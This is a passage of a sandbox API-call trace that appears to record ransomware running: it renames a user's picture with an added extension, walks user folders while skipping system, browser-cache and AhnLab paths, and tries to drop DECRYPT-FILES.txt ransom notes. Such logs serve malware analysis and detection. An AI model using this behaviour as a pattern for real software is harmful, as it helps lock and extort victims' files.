(in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.015] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.015] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.015] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.015] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.015] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.015] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.015] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.015] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.015] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.015] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.015] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.015] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.015] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.015] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.015] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.015] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.015] lstrlenA (lpString="DELETEATOM") returned 10 [0087.015] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.015] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.015] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.015] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.015] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.015] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.015] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.015] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.015] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.015] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.015] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.015] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.015] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.015] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.015] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.016] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.016] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.016] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.016] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.016] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.016] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.016] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.016] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.016] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.016] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.016] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.016] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.016] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.016] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.016] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.016] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.016] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.016] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.016] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.016] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.016] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.016] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.016] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.016] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.016] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.016] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.016] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.016] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.016] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.016] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.016] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.016] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.016] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.016] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.016] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.016] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.016] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.017] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.017] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.017] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.017] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.017] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.017] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.017] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.017] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.017] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.017] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.017] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.017] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.017] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.017] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.017] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.017] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.017] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.017] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.017] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.017] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.017] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.017] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.017] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.017] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.017] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.017] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.017] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.017] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.017] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.017] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.018] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Zr3fqdEKfc.jpg") returned 53 [0087.018] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Zr3fqdEKfc.jpg.Qqz7Hy") returned 60 [0087.018] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Zr3fqdEKfc.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zr3fqdekfc.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Zr3fqdEKfc.jpg.Qqz7Hy" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zr3fqdekfc.jpg.qqz7hy"), dwFlags=0x0) returned 1 [0087.018] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.018] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.019] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.019] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc5ab4d0, ftCreationTime.dwHighDateTime=0x1d4c6d4, ftLastAccessTime.dwLowDateTime=0x35cd44d0, ftLastAccessTime.dwHighDateTime=0x1d4d3c5, ftLastWriteTime.dwLowDateTime=0x35cd44d0, ftLastWriteTime.dwHighDateTime=0x1d4d3c5, nFileSizeHigh=0x0, nFileSizeLow=0xefe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Zr3fqdEKfc.jpg", cAlternateFileName="ZR3FQD~1.JPG")) returned 0 [0087.019] FindClose (in: hFindFile=0x5f8b98 | out: hFindFile=0x5f8b98) returned 1 [0087.019] CloseHandle (hObject=0x430) returned 1 [0087.019] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0087.019] lstrcmpW (lpString1="PrintHood", lpString2=".") returned 1 [0087.019] lstrcmpW (lpString1="PrintHood", lpString2="..") returned 1 [0087.019] lstrcatW (in: lpString1="PrintHood", lpString2="\\" | out: lpString1="PrintHood\\") returned="PrintHood\\" [0087.019] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="PrintHood\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\" [0087.019] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\Program Files") returned 0x0 [0087.019] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch=":\\Windows") returned 0x0 [0087.019] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\Games\\") returned 0x0 [0087.019] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.019] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.020] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.020] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.020] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.020] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\All Users") returned 0x0 [0087.020] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.020] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.020] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\AppData\\Local") returned 0x0 [0087.020] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="AhnLab") returned 0x0 [0087.020] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0087.020] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned 40 [0087.020] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.020] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\\\jkbimi8.tmp") returned 52 [0087.020] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\printhood\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0087.024] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned 40 [0087.024] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0087.024] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\\\DECRYPT-FILES.txt") returned 58 [0087.024] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\printhood\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0087.024] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned 40 [0087.024] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*" [0087.024] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc5ab4d0, ftCreationTime.dwHighDateTime=0x1d4c6d4, ftLastAccessTime.dwLowDateTime=0x35cd44d0, ftLastAccessTime.dwHighDateTime=0x1d4d3c5, ftLastWriteTime.dwLowDateTime=0x35cd44d0, ftLastWriteTime.dwHighDateTime=0x1d4d3c5, nFileSizeHigh=0x0, nFileSizeLow=0xefe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Zr3fqdEKfc.jpg", cAlternateFileName="苟盅꬈썮ϲ")) returned 0xffffffff [0087.024] CloseHandle (hObject=0x430) returned 1 [0087.024] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0087.024] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0087.024] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0087.024] lstrcatW (in: lpString1="Recent", lpString2="\\" | out: lpString1="Recent\\") returned="Recent\\" [0087.024] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Recent\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\" [0087.025] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\Program Files") returned 0x0 [0087.025] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch=":\\Windows") returned 0x0 [0087.025] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\Games\\") returned 0x0 [0087.025] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.025] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.025] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.025] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.025] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.025] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\All Users") returned 0x0 [0087.025] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.025] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.025] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\AppData\\Local") returned 0x0 [0087.025] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="AhnLab") returned 0x0 [0087.025] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0087.025] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned 37 [0087.025] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.025] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\\\jkbimi8.tmp") returned 49 [0087.025] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0087.026] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned 37 [0087.026] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0087.026] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\\\DECRYPT-FILES.txt") returned 55 [0087.026] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0087.026] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned 37 [0087.026] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*" [0087.026] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc5ab4d0, ftCreationTime.dwHighDateTime=0x1d4c6d4, ftLastAccessTime.dwLowDateTime=0x35cd44d0, ftLastAccessTime.dwHighDateTime=0x1d4d3c5, ftLastWriteTime.dwLowDateTime=0x35cd44d0, ftLastWriteTime.dwHighDateTime=0x1d4d3c5, nFileSizeHigh=0x0, nFileSizeLow=0xefe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Zr3fqdEKfc.jpg", cAlternateFileName="苟盅꬈썮ϲ")) returned 0xffffffff [0087.026] CloseHandle (hObject=0x430) returned 1 [0087.026] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0087.026] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1 [0087.026] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1 [0087.026] lstrcatW (in: lpString1="Saved Games", lpString2="\\" | out: lpString1="Saved Games\\") returned="Saved Games\\" [0087.026] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Saved Games\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" [0087.026] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\Program Files") returned 0x0 [0087.026] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch=":\\Windows") returned 0x0 [0087.026] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\Games\\") returned 0x0 [0087.026] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.027] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.027] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.027] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.027] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.027] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\All Users") returned 0x0 [0087.027] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.027] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.027] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\AppData\\Local") returned 0x0 [0087.027] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="AhnLab") returned 0x0 [0087.027] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0087.027] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned 42 